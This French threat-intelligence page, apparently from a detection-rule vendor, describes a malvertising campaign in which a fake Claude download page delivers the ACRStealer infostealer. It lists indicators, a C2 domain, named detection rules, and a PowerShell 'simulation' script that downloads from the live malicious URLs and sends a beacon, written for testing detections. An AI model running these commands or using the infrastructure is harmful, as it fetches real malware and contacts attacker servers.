Suivre 
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Des chercheurs en menaces ont identifié une campagne publicitaire malveillante qui redirige les utilisateurs vers une fausse page de téléchargement de Claude. Le site fournit différentes charges utiles en fonction du système d’exploitation de la victime, avec une chaîne d’infection Windows menant au déploiement de ACRStealer. Les enquêteurs ont lié l’activité à plusieurs domaines compromis et à un serveur de commande et de contrôle utilisé après l’infection. La campagne s’appuie sur des URL obfusquées et un script PowerShell pour compléter la livraison des charges utiles.
Enquête
L’analyste a tracé l’activité depuis la fausse page de Claude initiale à travers plusieurs URL redirigées hébergées sur différents domaines. Au cours de la chaîne d’infection, une archive ZIP, un script PowerShell et une image JPEG ont été téléchargés, suivis par une communication HTTPS avec un domaine de commande et de contrôle. L’analyse du trafic a confirmé que le comportement du réseau après l’infection correspondait à l’infrastructure associée à la famille ACRStealer.
Atténuation
Les organisations devraient bloquer les domaines et URL malveillants identifiés à la périphérie du réseau. Le trafic publicitaire devrait être filtré pour détecter les publicités malveillantes faisant référence à la fausse page de Claude ou à des leurres d’usurpation similaires. La protection des endpoints devrait également être configurée pour détecter les comportements liés à ACRStealer et l’exécution suspecte de PowerShell.
Réponse
Les défenseurs devraient surveiller les connexions sortantes vers le domaine de commande et de contrôle yw.enhanceblabber.cc et alerter sur les téléchargements de l’archive ZIP et du script PowerShell identifiés. Tout hôte présentant une activité liée devrait subir une collecte d’investigation médico-légale pour détecter d’éventuels artefacts ACRStealer et être isolé si le compromis est confirmé.
Flux d’attaque
Nous sommes encore en train de mettre à jour cette partie. Inscrivez-vous pour être notifié
Prévenez-moiDétections
Comportement d’évasion de défense LOLBAS MSHTA suspect par la détection des commandes associées (via process_creation)
Voir
Commande et Contrôle suspect par demande DNS de domaine de premier niveau inhabituel (TLD) (via dns)
Voir
IOCs (HashSha256) pour détecter : Possible ACR Stealer depuis la page usurpant Claude
Voir
Détection de la distribution d’ACR Stealer via les fausses pages de téléchargement de Claude [Connexion réseau Windows]
Voir
Exécution de simulation
Prérequis : Le contrôle prévol Télémetrie & Baseline doit avoir réussi.
Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémetrie exacte attendue par la logique de détection.
-
Narration d’attaque & Commandes :
- Leur initiale : L’attaquant envoie un email de phishing contenant un lien vers
https://fairpoint29.com/. La victime clique sur le lien, qui charge une fausse page de téléchargement de Claude. - Exécution du téléchargeur malveillant : La page déclenche automatiquement un téléchargement depuis
https://primemetricsa.com/1518925, livrant une charge utile déguisée. - Récupération de la charge utile secondaire : Le stub téléchargé contacte
https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42dpour récupérer le binaire complet d’ACR Stealer. - Balise C2 : Une fois exécuté, le malware envoie une balise à
https://i.ibb.co/Xx16sbMz/init-block.jpg(une technique qui utilise l’hébergement d’images pour un C2 furtif).
Chaque étape génère une entrée de journal proxy correspondant exactement aux
domainesandurlles valeurs définies dans la règle Sigma, satisfaisant ainsi la condition de détection. - Leur initiale : L’attaquant envoie un email de phishing contenant un lien vers
-
Script de test de régression :
# ------------------------------------------------- # Simulation de distribution d'ACR Stealer – Règle de déclenchement # ------------------------------------------------- # Étape 1 : Fausse page de téléchargement de Claude (GET inoffensif) Invoke-WebRequest -Uri "https://fairpoint29.com/" -UseBasicParsing | Out-Null # Étape 2 : Téléchargeur binaire (simulée par un petit fichier de téléchargement) Invoke-WebRequest -Uri "https://primemetricsa.com/1518925" -OutFile "$env:TEMPloader.bin" -UseBasicParsing # Étape 3 : Récupération complète de la charge utile Invoke-WebRequest -Uri "https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d" ` -OutFile "$env:TEMPacr_steler.bin" -UseBasicParsing # Étape 4 : balise C2 (POST d'une petite image pour déguiser le trafic) $body = [System.Text.Encoding]::UTF8.GetBytes("balise") Invoke-WebRequest -Uri "https://i.ibb.co/Xx16sbMz/init-block.jpg" ` -Method Post -Body $body -ContentType "application/octet-stream" -UseBasicParsing | Out-Null # ------------------------------------------------- # Fin de la simulation # ------------------------------------------------- -
Commandes de nettoyage :
# Supprimer les artefacts téléchargés Remove-Item "$env:TEMPloader.bin" -ErrorAction SilentlyContinue Remove-Item "$env:TEMPacr_steler.bin" -ErrorAction SilentlyContinue # Vider le cache DNS pour éviter les entrées persistantes ipconfig /flushdns